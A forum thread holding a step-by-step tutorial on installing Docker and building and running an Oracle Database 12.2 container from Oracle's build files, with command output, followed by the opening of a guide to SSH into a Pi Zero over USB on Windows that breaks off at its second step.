Men in Black

Administrator

Last active 2 days ago

  1. 5 weeks ago
    Sun Aug 16 14:44:38 2020
    Men in Black started the conversation Creating an Oracle Database Docker image.

    [attachment:5f38e74664e32]

    Oracle has released Docker build files for the Oracle Database on Github . With those build files one can go ahead and build his or her own Docker image for the Oracle Database. If you don’t know what Docker is you should go and check it out. It’s a cool technology based on the Linux containers technology that allows you to containerize your application, whatever that application may be. Naturally, it didn’t take long for people to start looking at containerizing databases as well which makes a lot of sense, especially for, but not only, development and test environments. Here is a detailed blog post on how to containerize your Oracle Database by using those build files that Oracle has provided.

    What you need

    Environment

    My environment is as follows:

    • Oracle Linux 7.3 (4.1.12–94.3.8.el7uek.x86_64)
    • Docker 17.03.1-ce (docker-engine.x86_64 17.03.1.ce-3.0.1.el7)
    • Oracle Database 12.2.0.1 Enterprise Edition

    Docker setup

    The first thing, if not already done so, is to setup Docker on the environment. Luckily this is fairly straight forward. Docker is shipped as an addon with Oracle Linux 7 UEK4. As I’m running on such environment all I have to do is to is to enable the addons yum repository and install the docker-engine package. Note, this is done as the root Linux user:

    Enable OL7 addons repo

    [root@localhost ~]# yum-config-manager enable *addons*
    Loaded plugins: langpacks
    ================================================================== repo: ol7_addons ==================================================================
    [ol7_addons]
    async = True
    bandwidth = 0
    base_persistdir = /var/lib/yum/repos/x86_64/7Server
    baseurl = http://public-yum.oracle.com/repo/OracleLinux/OL7/addons/x86_64/
    cache = 0
    cachedir = /var/cache/yum/x86_64/7Server/ol7_addons
    check_config_file_age = True
    compare_providers_priority = 80
    cost = 1000
    deltarpm_metadata_percentage = 100
    deltarpm_percentage =
    enabled = True
    enablegroups = True
    exclude =
    failovermethod = priority
    ftp_disable_epsv = False
    gpgcadir = /var/lib/yum/repos/x86_64/7Server/ol7_addons/gpgcadir
    gpgcakey =
    gpgcheck = True
    gpgdir = /var/lib/yum/repos/x86_64/7Server/ol7_addons/gpgdir
    gpgkey = file:///etc/pki/rpm-gpg/RPM-GPG-KEY-oracle
    hdrdir = /var/cache/yum/x86_64/7Server/ol7_addons/headers
    http_caching = all
    includepkgs =
    ip_resolve =
    keepalive = True
    keepcache = False
    mddownloadpolicy = sqlite
    mdpolicy = group:small
    mediaid =
    metadata_expire = 21600
    metadata_expire_filter = read-only:present
    metalink =
    minrate = 0
    mirrorlist =
    mirrorlist_expire = 86400
    name = Oracle Linux 7Server Add ons (x86_64)
    old_base_cache_dir =
    password =
    persistdir = /var/lib/yum/repos/x86_64/7Server/ol7_addons
    pkgdir = /var/cache/yum/x86_64/7Server/ol7_addons/packages
    proxy = False
    proxy_dict =
    proxy_password =
    proxy_username =
    repo_gpgcheck = False
    retries = 10
    skip_if_unavailable = False
    ssl_check_cert_permissions = True
    sslcacert =
    sslclientcert =
    sslclientkey =
    sslverify = True
    throttle = 0
    timeout = 30.0
    ui_id = ol7_addons/x86_64
    ui_repoid_vars = releasever,
    basearch
    username =

    Install docker-engine

    [root@localhost ~]# yum install docker-engine
    Loaded plugins: langpacks, ulninfo
    Resolving Dependencies
    --> Running transaction check
    ---> Package docker-engine.x86_64 0:17.03.1.ce-3.0.1.el7 will be installed
    --> Processing Dependency: docker-engine-selinux >= 17.03.1.ce-3.0.1.el7 for package: docker-engine-17.03.1.ce-3.0.1.el7.x86_64
    --> Running transaction check
    ---> Package selinux-policy-targeted.noarch 0:3.13.1-102.0.3.el7_3.16 will be updated
    ---> Package selinux-policy-targeted.noarch 0:3.13.1-166.0.2.el7 will be an update
    --> Processing Dependency: selinux-policy = 3.13.1-166.0.2.el7 for package: selinux-policy-targeted-3.13.1-166.0.2.el7.noarch
    --> Running transaction check
    ---> Package selinux-policy.noarch 0:3.13.1-102.0.3.el7_3.16 will be updated
    ---> Package selinux-policy.noarch 0:3.13.1-166.0.2.el7 will be an update
    --> Finished Dependency Resolution
    Dependencies Resolved
    ======================================================================================================================================================
    Package Arch Version Repository Size
    ======================================================================================================================================================
    Installing:
    docker-engine x86_64 17.03.1.ce-3.0.1.el7 ol7_addons 19 M
    Updating:
    selinux-policy-targeted noarch 3.13.1-166.0.2.el7 ol7_latest 6.5 M
    Updating for dependencies:
    selinux-policy noarch 3.13.1-166.0.2.el7 ol7_latest 435 k
    Transaction Summary
    ======================================================================================================================================================
    Install 1 Package
    Upgrade 1 Package (+1 Dependent package)
    Total download size: 26 M
    Is this ok [y/d/N]: y
    Downloading packages:
    No Presto metadata available for ol7_latest
    (1/3): selinux-policy-3.13.1-166.0.2.el7.noarch.rpm | 435 kB 00:00:00
    (2/3): selinux-policy-targeted-3.13.1-166.0.2.el7.noarch.rpm | 6.5 MB 00:00:01
    (3/3): docker-engine-17.03.1.ce-3.0.1.el7.x86_64.rpm | 19 MB 00:00:04
    ------------------------------------------------------------------------------------------------------------------------------------------------------
    Total 6.2 MB/s | 26 MB 00:00:04
    Running transaction check
    Running transaction test
    Transaction test succeeded
    Running transaction
    Updating : selinux-policy-3.13.1-166.0.2.el7.noarch 1/5
    Updating : selinux-policy-targeted-3.13.1-166.0.2.el7.noarch 2/5
    Installing : docker-engine-17.03.1.ce-3.0.1.el7.x86_64 3/5
    Cleanup : selinux-policy-targeted-3.13.1-102.0.3.el7_3.16.noarch 4/5
    Cleanup : selinux-policy-3.13.1-102.0.3.el7_3.16.noarch 5/5
    Verifying : selinux-policy-targeted-3.13.1-166.0.2.el7.noarch 1/5
    Verifying : selinux-policy-3.13.1-166.0.2.el7.noarch 2/5
    Verifying : docker-engine-17.03.1.ce-3.0.1.el7.x86_64 3/5
    Verifying : selinux-policy-targeted-3.13.1-102.0.3.el7_3.16.noarch 4/5
    Verifying : selinux-policy-3.13.1-102.0.3.el7_3.16.noarch 5/5
    Installed:
    docker-engine.x86_64 0:17.03.1.ce-3.0.1.el7
    Updated:
    selinux-policy-targeted.noarch 0:3.13.1-166.0.2.el7
    Dependency Updated:
    selinux-policy.noarch 0:3.13.1-166.0.2.el7
    Complete!

    And that’s it! Docker is now installed on the machine. Before I proceed with building an image I first have to configure my environment appropriately.

    Enable non-root user

    The first thing I want to do is to enable a non-root user to communicate with the Docker engine. Enabling a non-root user is fairly straight forward as well. When Docker was installed a new Unix group docker was created along with it. If you want to allow a user to communicate with the Docker daemon directly, hence avoiding to run as the root user, all you have to do is to add that user to the docker group. In my case I want to add the oracle user to that group:

    [root@localhost ~]# id oracle
    uid=1000(oracle) gid=1001(oracle) groups=1001(oracle),1000(dba)
    [root@localhost ~]# usermod -a -G docker oracle
    [root@localhost ~]# id oracle
    uid=1000(oracle) gid=1001(oracle) groups=1001(oracle),1000(dba),981(docker)

    [h]
    Increase base image size[/h]
    Before I go ahead and run the image build I want to double check one important parameter: The default base image size for the Docker container. In the past Docker came with a maximum container size of 10 GB by default. While this is more than enough for running some applications inside Docker containers this needed to be increased for Oracle Database. The Oracle Database 12.2.0.1 image requires about 13GB of space for the image build.
    Recently the default size has been increased to 25GB which will be more than enough for the Oracle Database image. The setting can be found and double checked in /etc/sysconfig/docker-storage as the storage-opt dm.basesize parameter:

    [root@localhost ~]# cat /etc/sysconfig/docker-storage
    # This file may be automatically generated by an installation program.
    # By default, Docker uses a loopback-mounted sparse file in
    # /var/lib/docker. The loopback makes it slower, and there are some
    # restrictive defaults, such as 100GB max storage.
    # If your installation did not set a custom storage for Docker, you
    # may do it below.
    # Example: Use a custom pair of raw logical volumes (one for metadata,
    # one for data).
    # DOCKER_STORAGE_OPTIONS = --storage-opt dm.metadatadev=/dev/mylogvol/my-docker-metadata --storage-opt dm.datadev=/dev/mylogvol/my-docker-data
    DOCKER_STORAGE_OPTIONS= --storage-driver devicemapper --storage-opt dm.basesize=25G

    Start and enable the Docker service

    The final step is to start the docker service and configure it to start at boot time. This is done via the systemctl command:

    [root@localhost ~]# systemctl start docker
    [root@localhost ~]# systemctl enable docker
    Created symlink from /etc/systemd/system/multi-user.target.wants/docker.service to /usr/lib/systemd/system/docker.service.
    [root@localhost ~]# systemctl status docker
    ● docker.service - Docker Application Container Engine
    Loaded: loaded (/usr/lib/systemd/system/docker.service; enabled; vendor preset: disabled)
    Drop-In: /etc/systemd/system/docker.service.d
    └─docker-sysconfig.conf
    Active: active (running) since Sun 2017-08-20 14:18:16 EDT; 5s ago
    Docs: https://docs.docker.com
    Main PID: 19203 (dockerd)
    Memory: 12.8M
    CGroup: /system.slice/docker.service
    ├─19203 /usr/bin/dockerd --selinux-enabled --storage-driver devicemapper --storage-opt dm.basesize=25G
    └─19207 docker-containerd -l unix:///var/run/docker/libcontainerd/docker-containerd.sock --metrics-interval=0 --start-timeout 2m --state...

    As a last step you can verify the setup and the base image size (check for Base Device Size:) via docker info:

    [root@localhost ~]# docker info
    Containers: 0
    Running: 0
    Paused: 0
    Stopped: 0
    Images: 0
    Server Version: 17.03.1-ce
    Storage Driver: devicemapper
    Pool Name: docker-249:0-202132724-pool
    Pool Blocksize: 65.54 kB
    Base Device Size: 26.84 GB
    Backing Filesystem: xfs
    Data file: /dev/loop0
    Metadata file: /dev/loop1
    Data Space Used: 14.42 MB
    Data Space Total: 107.4 GB
    Data Space Available: 47.98 GB
    Metadata Space Used: 581.6 kB
    Metadata Space Total: 2.147 GB
    Metadata Space Available: 2.147 GB
    Thin Pool Minimum Free Space: 10.74 GB
    Udev Sync Supported: true
    Deferred Removal Enabled: false
    Deferred Deletion Enabled: false
    Deferred Deleted Device Count: 0
    Data loop file: /var/lib/docker/devicemapper/devicemapper/data
    WARNING: Usage of loopback devices is strongly discouraged for production use. Use `--storage-opt dm.thinpooldev` to specify a custom block storage device.
    Metadata loop file: /var/lib/docker/devicemapper/devicemapper/metadata
    Library Version: 1.02.135-RHEL7 (2016-11-16)
    Logging Driver: json-file
    Cgroup Driver: cgroupfs
    Plugins:
    Volume: local
    Network: bridge host macvlan null overlay
    Swarm: inactive
    Runtimes: runc
    Default Runtime: runc
    Init Binary: docker-init
    containerd version: 4ab9917febca54791c5f071a9d1f404867857fcc
    runc version: 54296cf40ad8143b62dbcaa1d90e520a2136ddfe
    init version: 949e6fa
    Security Options:
    seccomp
    Profile: default
    selinux
    Kernel Version: 4.1.12-94.3.8.el7uek.x86_64
    Operating System: Oracle Linux Server 7.3
    OSType: linux
    Architecture: x86_64
    CPUs: 1
    Total Memory: 7.795 GiB
    Name: localhost.localdomain
    ID: D7CR:3DGV:QUGO:X7EB:AVX3:DWWW:RJIA:QVVT:I2YR:KJXV:ALR4:WLBV
    Docker Root Dir: /var/lib/docker
    Debug Mode (client): false
    Debug Mode (server): false
    Registry: https://index.docker.io/v1/
    Experimental: false
    Insecure Registries:
    127.0.0.0/8
    Live Restore Enabled: false

    That concludes the installation of Docker itself.

    Building the Oracle Database Docker image

    Now that Docker is up and running I can start building the image. First I need to get the Docker build files and the Oracle install binaries, both are easy to obtain as shown below. Note that I use the oracle Linux user for all the following steps, which I have enabled previously to communicate with the Docker daemon:

    Obtaining the required files

    Github build files

    First I have to download the Docker build files. There are various ways to do this. I can for example clone the Git repository directly. But for simplicity and for the people who aren’t familiar with git I will just use the download option on Github itself. If you go to the main repository URL https://github.com/oracle/docker-images/ you will see a green button saying “Clone or download” and by clicking on it you will have the option “Download ZIP“. Alternatively you can also just download the repository directly via the static URL: https://github.com/oracle/docker-images/archive/master.zip

    [oracle@localhost ~]$ wget https://github.com/oracle/docker-images/archive/master.zip
    --2017-08-20 14:31:32-- https://github.com/oracle/docker-images/archive/master.zip
    Resolving github.com (github.com)... 192.30.255.113, 192.30.255.112
    Connecting to github.com (github.com)|192.30.255.113|:443... connected.
    HTTP request sent, awaiting response... 302 Found
    Location: https://codeload.github.com/oracle/docker-images/zip/master [following]
    --2017-08-20 14:31:33-- https://codeload.github.com/oracle/docker-images/zip/master
    Resolving codeload.github.com (codeload.github.com)... 192.30.255.120, 192.30.255.121
    Connecting to codeload.github.com (codeload.github.com)|192.30.255.120|:443... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: unspecified [application/zip]
    Saving to: ‘master.zip’
    [ ] 4,411,616 3.37MB/s in 1.2s
    2017-08-20 14:31:34 (3.37 MB/s) - ‘master.zip’ saved [4411616]
    [oracle@localhost ~]$ unzip master.zip
    Archive: master.zip
    21041a743e4b0a910b0e51e17793bb7b0b18efef
    creating: docker-images-master/
    extracting: docker-images-master/.gitattributes
    inflating: docker-images-master/.gitignore
    inflating: docker-images-master/.gitmodules
    inflating: docker-images-master/CODEOWNERS
    inflating: docker-images-master/CONTRIBUTING.md
    ...
    ...
    ...
    creating: docker-images-master/OracleDatabase/
    extracting: docker-images-master/OracleDatabase/.gitignore
    inflating: docker-images-master/OracleDatabase/COPYRIGHT
    inflating: docker-images-master/OracleDatabase/LICENSE
    inflating: docker-images-master/OracleDatabase/README.md
    creating: docker-images-master/OracleDatabase/dockerfiles/
    ...
    ...
    ...
    inflating: docker-images-master/README.md
    [oracle@localhost ~]$

    Oracle installation binaries

    For the Oracle binaries just download them from where you usually would download them. Oracle Technology Network is probably the place that most people go to. Once you have downloaded them you can proceed with building the image:

    [oracle@localhost ~]$ ls -al *database*zip
    -rw-r--r--. 1 oracle oracle 1354301440 Aug 20 14:40 linuxx64_12201_database.zip

    Building the image

    Now that I have all the files it’s time to build the Docker image. You will find a separate README.md in the docker-images-master/OracleDatabase/SingleInstancedirectory which explains the build process in more details. Make sure that you always read that file as it will always reflect the latest changes in the build files! You will also find a buildDockerImage.sh shell script in the docker-images-master/OracleDatabase/SingleInstance/dockerfiles directory that does the legwork of the build for you. For the build it is essential that I copy the install files into the correct version directory. As I’m going to create an Oracle Database 12.2.0.1 image I need to copy the install zip file into docker-images-master/OracleDatabase/SingleInstance/dockerfiles/12.2.0.1:

    [oracle@localhost ~]$ cd docker-images-master/OracleDatabase/SingleInstance/dockerfiles/12.2.0.1/
    [oracle@localhost 12.2.0.1]$ cp ~/linuxx64_12201_database.zip .
    [oracle@localhost 12.2.0.1]$ ls -al
    total 3372832
    drwxrwxr-x. 2 oracle oracle 4096 Aug 20 14:44 .
    drwxrwxr-x. 5 oracle oracle 77 Aug 19 00:35 ..
    -rwxr-xr-x. 1 oracle oracle 1259 Aug 19 00:35 checkDBStatus.sh
    -rwxr-xr-x. 1 oracle oracle 909 Aug 19 00:35 checkSpace.sh
    -rw-rw-r--. 1 oracle oracle 62 Aug 19 00:35 Checksum.ee
    -rw-rw-r--. 1 oracle oracle 62 Aug 19 00:35 Checksum.se2
    -rwxr-xr-x. 1 oracle oracle 2964 Aug 19 00:35 createDB.sh
    -rw-rw-r--. 1 oracle oracle 9203 Aug 19 00:35 dbca.rsp.tmpl
    -rw-rw-r--. 1 oracle oracle 6878 Aug 19 00:35 db_inst.rsp
    -rw-rw-r--. 1 oracle oracle 2550 Aug 19 00:35 Dockerfile.ee
    -rw-rw-r--. 1 oracle oracle 2552 Aug 19 00:35 Dockerfile.se2
    -rwxr-xr-x. 1 oracle oracle 2261 Aug 19 00:35 installDBBinaries.sh
    -rw-r--r--. 1 oracle oracle 3453696911 Aug 20 14:45 linuxx64_12201_database.zip
    -rwxr-xr-x. 1 oracle oracle 6151 Aug 19 00:35 runOracle.sh
    -rwxr-xr-x. 1 oracle oracle 1026 Aug 19 00:35 runUserScripts.sh
    -rwxr-xr-x. 1 oracle oracle 769 Aug 19 00:35 setPassword.sh
    -rwxr-xr-x. 1 oracle oracle 879 Aug 19 00:35 setupLinuxEnv.sh
    -rwxr-xr-x. 1 oracle oracle 689 Aug 19 00:35 startDB.sh
    [oracle@localhost 12.2.0.1]$

    Now that the zip file is in place I am ready to invoke the buildDockerImage.sh shell script in the dockerfiles folder. The script takes a couple of parameters, -v for the version and -e for telling it that I want Enterprise Edition. Note: The build of the image will pull the Oracle Linux slim base image and execute a yum install as well as a yum upgrade inside the container. For it to success to have to have internet connectivity:

    [oracle@localhost 12.2.0.1]$ cd ..
    [oracle@localhost dockerfiles]$ ./buildDockerImage.sh -v 12.2.0.1 -e
    Checking if required packages are present and valid...
    linuxx64_12201_database.zip: OK
    ==========================
    DOCKER info:
    Containers: 0
    Running: 0
    Paused: 0
    Stopped: 0
    Images: 0
    Server Version: 17.03.1-ce
    Storage Driver: devicemapper
    Pool Name: docker-249:0-202132724-pool
    Pool Blocksize: 65.54 kB
    Base Device Size: 26.84 GB
    Backing Filesystem: xfs
    Data file: /dev/loop0
    Metadata file: /dev/loop1
    Data Space Used: 14.42 MB
    Data Space Total: 107.4 GB
    Data Space Available: 47.98 GB
    Metadata Space Used: 581.6 kB
    Metadata Space Total: 2.147 GB
    Metadata Space Available: 2.147 GB
    Thin Pool Minimum Free Space: 10.74 GB
    Udev Sync Supported: true
    Deferred Removal Enabled: false
    Deferred Deletion Enabled: false
    Deferred Deleted Device Count: 0
    Data loop file: /var/lib/docker/devicemapper/devicemapper/data
    WARNING: Usage of loopback devices is strongly discouraged for production use. Use `--storage-opt dm.thinpooldev` to specify a custom block storage device.
    Metadata loop file: /var/lib/docker/devicemapper/devicemapper/metadata
    Library Version: 1.02.135-RHEL7 (2016-11-16)
    Logging Driver: json-file
    Cgroup Driver: cgroupfs
    Plugins:
    Volume: local
    Network: bridge host macvlan null overlay
    Swarm: inactive
    Runtimes: runc
    Default Runtime: runc
    Init Binary: docker-init
    containerd version: 4ab9917febca54791c5f071a9d1f404867857fcc
    runc version: 54296cf40ad8143b62dbcaa1d90e520a2136ddfe
    init version: 949e6fa
    Security Options:
    seccomp
    Profile: default
    selinux
    Kernel Version: 4.1.12-94.3.8.el7uek.x86_64
    Operating System: Oracle Linux Server 7.3
    OSType: linux
    Architecture: x86_64
    CPUs: 1
    Total Memory: 7.795 GiB
    Name: localhost.localdomain
    ID: D7CR:3DGV:QUGO:X7EB:AVX3:DWWW:RJIA:QVVT:I2YR:KJXV:ALR4:WLBV
    Docker Root Dir: /var/lib/docker
    Debug Mode (client): false
    Debug Mode (server): false
    Registry: https://index.docker.io/v1/
    Experimental: false
    Insecure Registries:
    127.0.0.0/8
    Live Restore Enabled: false
    ==========================
    Building image 'oracle/database:12.2.0.1-ee' ...
    Sending build context to Docker daemon 3.454 GB
    Step 1/16 : FROM oraclelinux:7-slim
    7-slim: Pulling from library/oraclelinux
    3152c71f8d80: Pull complete
    Digest: sha256:e464042b724d41350fb3ac2c2f84bd9d28d98302c9ebe66048a5367682e5fad2
    Status: Downloaded newer image for oraclelinux:7-slim
    ---> c0feb50f7527
    Step 2/16 : MAINTAINER Gerald Venzl
    ---> Running in e442cae35367
    ---> 08f875cea39d
    ...
    ...
    ...
    Step 15/16 : EXPOSE 1521 5500
    ---> Running in 4476c1c236e1
    ---> d01d39e39920
    Removing intermediate container 4476c1c236e1
    Step 16/16 : CMD exec $ORACLE_BASE/$RUN_FILE
    ---> Running in 8757674cc3d5
    ---> 98129834d5ad
    Removing intermediate container 8757674cc3d5
    Successfully built 98129834d5ad
    Oracle Database Docker Image for 'ee' version 12.2.0.1 is ready to be extended:
    --> oracle/database:12.2.0.1-ee
    Build completed in 802 seconds.

    Starting and connecting to the Oracle Database inside a Docker container

    Once the build was successful I can now start and run the Oracle Database inside a Docker container. All I have to do is to issue the docker run command and pass in the appropriate parameters. One important parameter is the -p for the mapping of ports inside the container to the outside world. This is required so that I can also connect to the database from outside the Docker container. Another important parameter is the -v parameter which allows me to keep the data files of the database in a location outside the Docker container. This is important as it will allow me to preserve my data even when the container is thrown away. You should always use the -v parameter or create a named Docker volume! The last useful parameter that I’m going to use is the --name parameter which specifies the name of the Docker container itself. If omitted a random name will be generated. However, passing on a name will allow me to refer to the container via that name later on:

    [oracle@localhost dockerfiles]$ cd ~
    [oracle@localhost ~]$ mkdir oradata
    [oracle@localhost ~]$ chmod a+w oradata
    [oracle@localhost ~]$ docker run --name oracle-ee -p 1521:1521 -v /home/oracle/oradata:/opt/oracle/oradata oracle/database:12.2.0.1-ee
    ORACLE PASSWORD FOR SYS, SYSTEM AND PDBADMIN: 3y4RL1K7org=1
    LSNRCTL for Linux: Version 12.2.0.1.0 - Production on 20-AUG-2017 19:07:55
    Copyright (c) 1991, 2016, Oracle. All rights reserved.
    Starting /opt/oracle/product/12.2.0.1/dbhome_1/bin/tnslsnr: please wait...
    TNSLSNR for Linux: Version 12.2.0.1.0 - Production
    System parameter file is /opt/oracle/product/12.2.0.1/dbhome_1/network/admin/listener.ora
    Log messages written to /opt/oracle/diag/tnslsnr/e3d1a2314421/listener/alert/log.xml
    Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC1)))
    Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=0.0.0.0)(PORT=1521)))
    Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC1)))
    STATUS of the LISTENER
    ------------------------
    Alias LISTENER
    Version TNSLSNR for Linux: Version 12.2.0.1.0 - Production
    Start Date 20-AUG-2017 19:07:56
    Uptime 0 days 0 hr. 0 min. 0 sec
    Trace Level off
    Security ON: Local OS Authentication
    SNMP OFF
    Listener Parameter File /opt/oracle/product/12.2.0.1/dbhome_1/network/admin/listener.ora
    Listener Log File /opt/oracle/diag/tnslsnr/e3d1a2314421/listener/alert/log.xml
    Listening Endpoints Summary...
    (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC1)))
    (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=0.0.0.0)(PORT=1521)))
    The listener supports no services
    The command completed successfully
    [WARNING] [DBT-10102] The listener configuration is not selected for the database. EM DB Express URL will not be accessible.
    CAUSE: The database should be registered with a listener in order to access the EM DB Express URL.
    ACTION: Select a listener to be registered or created with the database.
    Copying database files
    1% complete
    13% complete
    25% complete
    Creating and starting Oracle instance
    26% complete
    30% complete
    31% complete
    35% complete
    38% complete
    39% complete
    41% complete
    Completing Database Creation
    42% complete
    43% complete
    44% complete
    46% complete
    47% complete
    50% complete
    Creating Pluggable Databases
    55% complete
    75% complete
    Executing Post Configuration Actions
    100% complete
    Look at the log file "/opt/oracle/cfgtoollogs/dbca/ORCLCDB/ORCLCDB.log" for further details.
    SQL*Plus: Release 12.2.0.1.0 Production on Sun Aug 20 19:16:01 2017
    Copyright (c) 1982, 2016, Oracle. All rights reserved.
    Connected to:
    Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production
    SQL>
    System altered.
    SQL>
    Pluggable database altered.
    SQL> Disconnected from Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production
    #########################
    DATABASE IS READY TO USE!
    #########################
    The following output is now a tail of the alert.log:
    Completed: alter pluggable database ORCLPDB1 open
    2017-08-20T19:16:01.025829+00:00
    ORCLPDB1(3):CREATE SMALLFILE TABLESPACE "USERS" LOGGING DATAFILE '/opt/oracle/oradata/ORCLCDB/ORCLPDB1/users01.dbf' SIZE 5M REUSE AUTOEXTEND ON NEXT 1280K MAXSIZE UNLIMITED EXTENT MANAGEMENT LOCAL SEGMENT SPACE MANAGEMENT AUTO
    ORCLPDB1(3):Completed: CREATE SMALLFILE TABLESPACE "USERS" LOGGING DATAFILE '/opt/oracle/oradata/ORCLCDB/ORCLPDB1/users01.dbf' SIZE 5M REUSE AUTOEXTEND ON NEXT 1280K MAXSIZE UNLIMITED EXTENT MANAGEMENT LOCAL SEGMENT SPACE MANAGEMENT AUTO
    ORCLPDB1(3):ALTER DATABASE DEFAULT TABLESPACE "USERS"
    ORCLPDB1(3):Completed: ALTER DATABASE DEFAULT TABLESPACE "USERS"
    2017-08-20T19:16:01.889003+00:00
    ALTER SYSTEM SET control_files='/opt/oracle/oradata/ORCLCDB/control01.ctl' SCOPE=SPFILE;
    ALTER PLUGGABLE DATABASE ORCLPDB1 SAVE STATE
    Completed: ALTER PLUGGABLE DATABASE ORCLPDB1 SAVE STATE

    On the very first startup of the container a new database is being created. Subsequent startups of the same container or newly created containers pointing to the same volume will just start up the database again. Once the database is created and or started the container will run a tail -f on the Oracle Database alert.log file. This is done for convenience so that issuing a docker logs command will actually print the logs of the database running inside that container. Once the database is created or started up you will see the line DATABASE IS READY TO USE! in the output. After that you can connect to the database.

    Resetting the database admin accounts passwords

    The startup script also generated a password for the database admin accounts. You can find the password next to the line ORACLE PASSWORD FOR SYS, SYSTEM AND PDBADMIN: in the output. You can either use that password going forward or you can reset it to a password of your choice. The container provides a script called setPassword.sh for resetting the password. In a new shell just execute following command against the running container:

    [oracle@localhost ~]$ docker exec oracle-ee ./setPassword.sh LetsDocker
    The Oracle base remains unchanged with value /opt/oracle
    SQL*Plus: Release 12.2.0.1.0 Production on Sun Aug 20 19:17:08 2017
    Copyright (c) 1982, 2016, Oracle. All rights reserved.
    Connected to:
    Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production
    SQL>
    User altered.
    SQL>
    User altered.
    SQL>
    Session altered.
    SQL>
    User altered.
    SQL> Disconnected from Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production

    Connecting to the Oracle Database

    Now that the container is running and the port 1521 mapped to the outside world I can connect to the database inside the container:

    [oracle@localhost ~]$ sql system/LetsDocker@//localhost:1521/ORCLPDB1
    SQLcl: Release 4.2.0 Production on Sun Aug 20 19:56:43 2017
    Copyright (c) 1982, 2017, Oracle. All rights reserved.
    Last Successful login time: Sun Aug 20 2017 12:21:42 -07:00
    Connected to:
    Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production
    SQL> grant connect, resource to gvenzl identified by supersecretpwd;
    Grant succeeded.
    SQL> conn gvenzl/supersecretpwd@//localhost:1521/ORCLPDB1
    Connected.
    SQL>

    Stopping the Oracle Database Docker container

    If you wish to stop the Docker container you can just do so via the docker stop command. All you will have to do is to issue the command and pass on the container name or id. This will trigger the container to issue a shutdown immediate for the database inside the container. By default Docker will only allow 10 seconds for the container to shutdown before killing it. For applications that may be fine but for persistent containers such as the Oracle Database container you may want to give the container a bit more time to shutdown the database appropriately. You can do that via the -t option that allows you to pass on a new timeout in seconds for the container to shutdown successfully. I will give the database 30 seconds to shutdown but it’s important to point out that it doesn’t really matter how long you give the container to shutdown. Once the database is shutdown the container will exit normal. It will not wait all the seconds that you have specified until returning control. So even if you give it 10 minutes (600 seconds) it will still return as soon as the database is shutdown. Just keep that in mind when specifying a timeout for busy database containers:

    [oracle@localhost ~]$ docker stop -t 30 oracle-ee
    oracle-ee

    Restarting the Oracle Database Docker container

    A stopped container can always be restarted via the docker start command:

    [oracle@localhost ~]$ docker start oracle-ee
    oracle-ee

    The docker start command will put the container into background and return control immediately. You can check the status of the container via the docker logs command which should print the same DATABASE IS READY TO USE! line. You will also see that this time the database was just restarted rather than created. Note, a docker logs -f will follow the log output, i.e. keep on printing new lines:

    [oracle@localhost ~]$ docker logs oracle-ee
    ...
    ...
    ...
    SQL*Plus: Release 12.2.0.1.0 Production on Sun Aug 20 19:30:31 2017
    Copyright (c) 1982, 2016, Oracle.  All rights reserved.
    Connected to an idle instance.
    SQL> ORACLE instance started.
    Total System Global Area 1610612736 bytes
    Fixed Size          8793304 bytes
    Variable Size         520094504 bytes
    Database Buffers     1073741824 bytes
    Redo Buffers            7983104 bytes
    Database mounted.
    Database opened.
    SQL> Disconnected from Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production
    #########################
    DATABASE IS READY TO USE!
    #########################
    The following output is now a tail of the alert.log:
    ORCLPDB1(3):Undo initialization finished serial:0 start:6800170 end:6800239 diff:69 ms (0.1 seconds)
    ORCLPDB1(3):Database Characterset for ORCLPDB1 is AL32UTF8
    ORCLPDB1(3):Opatch validation is skipped for PDB ORCLPDB1 (con_id=0)
    ORCLPDB1(3):Opening pdb with no Resource Manager plan active
    2017-08-20T19:30:43.703897+00:00
    Pluggable database ORCLPDB1 opened read write

    Now that the database is up and running again I can connect once more to the database inside:

    [oracle@localhost ~]$ sql gvenzl/supersecretpwd@//localhost:1521/ORCLPDB1
    SQLcl: Release 4.2.0 Production on Sun Aug 20 20:10:28 2017
    Copyright (c) 1982, 2017, Oracle. All rights reserved.
    Connected to:
    Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production
    SQL> select sysdate from dual;
    SYSDATE
    ---------
    20-AUG-17
    SQL> exit
    Disconnected from Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production

    Summary

    This concludes how to containerize the Oracle Database using Docker. Note that Oracle has also provided build files for other Oracle Database versions and editions. The steps described above are largely the same but you should always refer to the README.md that comes with the build files. In there you will also find more options for how to run your Oracle Database containers.

  2. 4 months ago
    Fri May 8 09:38:37 2020
    Men in Black started the conversation Headless Pi Zero SSH Access over USB (Windows).

    [attachment:5eb4c5e960481]

    This article covers setting up a Pi Zero or Pi Zero W for headless SSH access over USB using Windows 10. The Mac OS version of these instructions can be found here: SSH into Pi Zero over USB (Mac).

    When you first get a Pi Zero the big question is – how do you access it? You can get a powered USB hub, USB keyboard, USB mouse and HDMI adapter. Or you can just plug it into your computer directly and access it over USB using ssh.

    These instructions are for a Raspbian Stretch image that I downloaded from here:

    https://www.raspberrypi.org/downloads/raspbian/

    I’m using the lite image (no desktop) version 4.9 from March 13, 2018. I’ve also done this with an older desktop version.

    Step 1. Edit the Image

    To access the Pi Zero over USB you have to edit the image first.

    • If you need to burn a new image to an SD card, download the Etcher tool from https://etcher.io
    • If you have the SD card in your Pi Zero, power it down and remove it
    • Put the SD card into an adapter and plug it into your computer
    • NOTE: Windows gets confused when you plug in a Raspbian image and it may try to get you to format it - always hit Cancel
    • In Windows 10 the SD card should appear in File Explorer as a drive named “boot”
    • If you just burned a new image using Etcher you may need to pull the SD card out and plug it back in again for File Explorer to see it
    • Open the SD card and explore the contents in File Explorer
    • You should now see the contents of the root of your Raspbian boot image

    Step 2. Enable ssh

